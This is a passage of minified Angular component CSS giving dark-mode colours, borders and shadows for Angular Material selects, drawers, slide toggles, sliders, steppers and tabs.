.mat-select-value[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-select-placeholder[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-select-disabled[_ngcontent-%COMP%]   .mat-select-value[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-select-panel[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-select-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-select-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple){background:rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused.mat-primary[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused.mat-accent[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-form-field.mat-focused.mat-warn[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-form-field[_ngcontent-%COMP%]   .mat-select.mat-select-invalid[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-form-field[_ngcontent-%COMP%]   .mat-select.mat-select-disabled[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-drawer-container[_ngcontent-%COMP%]{background-color:#303030;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-drawer[_ngcontent-%COMP%]{background-color:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-drawer.mat-drawer-push[_ngcontent-%COMP%]{background-color:#424242}.darkMode[_ngcontent-%COMP%]   .mat-drawer[_ngcontent-%COMP%]:not(.mat-drawer-side){box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-drawer-side[_ngcontent-%COMP%]{border-right:solid 1px rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-drawer-side[_ngcontent-%COMP%]{border-left:solid 1px rgba(255,255,255,.12);border-right:none}.darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-drawer-backdrop.mat-drawer-shown[_ngcontent-%COMP%]{background-color:#bdbdbd99}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#7b1fa28a}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#2196f38a}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#f443368a}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle[_ngcontent-%COMP%]:not(.mat-checked)   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f;background-color:#bdbdbd}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#2196f333}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#7b1fa233}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#f4433633}.darkMode[_ngcontent-%COMP%]   .mat-slider[_ngcontent-%COMP%]:hover   .mat-slider-track-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.cdk-focused[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]:hover   .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing)   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#ffffff4d;background-color:transparent}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover.mat-slider-disabled   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused.mat-slider-disabled   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider-has-ticks[_ngcontent-%COMP%]   .mat-slider-wrapper[_ngcontent-%COMP%]:after{border-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-slider-horizontal[_ngcontent-%COMP%]   .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to right,rgba(255,255,255,.7),rgba(255,255,255,.7) 2px,transparent 0,transparent);background-image:-moz-repeating-linear-gradient(.0001deg,rgba(255,255,255,.7),rgba(255,255,255,.7) 2px,transparent 0,transparent)}.darkMode[_ngcontent-%COMP%]   .mat-slider-vertical[_ngcontent-%COMP%]   .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to bottom,rgba(255,255,255,.7),rgba(255,255,255,.7) 2px,transparent 0,transparent)}.darkMode[_ngcontent-%COMP%]   .mat-step-header.cdk-keyboard-focused[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.cdk-program-focused[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]:hover:not([aria-disabled]), .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=false]{background-color:#ffffff0a}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=true]{cursor:default}@media (hover: none){.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]:hover{background:none}}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-optional[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{background-color:#ffffffb3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-error[_ngcontent-%COMP%]{background-color:transparent;color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-label.mat-step-label-active[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-label.mat-step-label-error[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-stepper-horizontal[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stepper-vertical[_ngcontent-%COMP%]{background-color:#424242}.darkMode[_ngcontent-%COMP%]   .mat-stepper-vertical-line[_ngcontent-%COMP%]:before{border-left-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%]:after, .darkMode[_ngcontent-%COMP%]   .mat-stepper-horizontal-line[_ngcontent-%COMP%]{border-top-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-sort-header-arrow[_ngcontent-%COMP%]{color:#c6c6c6}.darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-header[_ngcontent-%COMP%]{border-bottom:1px solid rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-tab-group-inverted-header[_ngcontent-%COMP%]   .mat-tab-nav-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group-inverted-header[_ngcontent-%COMP%]   .mat-tab-header[_ngcontent-%COMP%]{border-top:1px solid rgba(255,255,255,.12);border-bottom:none}.darkMode[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-tab-group[class*=mat-background-][_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar[class*=mat-background-][_ngcontent-%COMP%]{border-bottom:none;border-top:none}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > 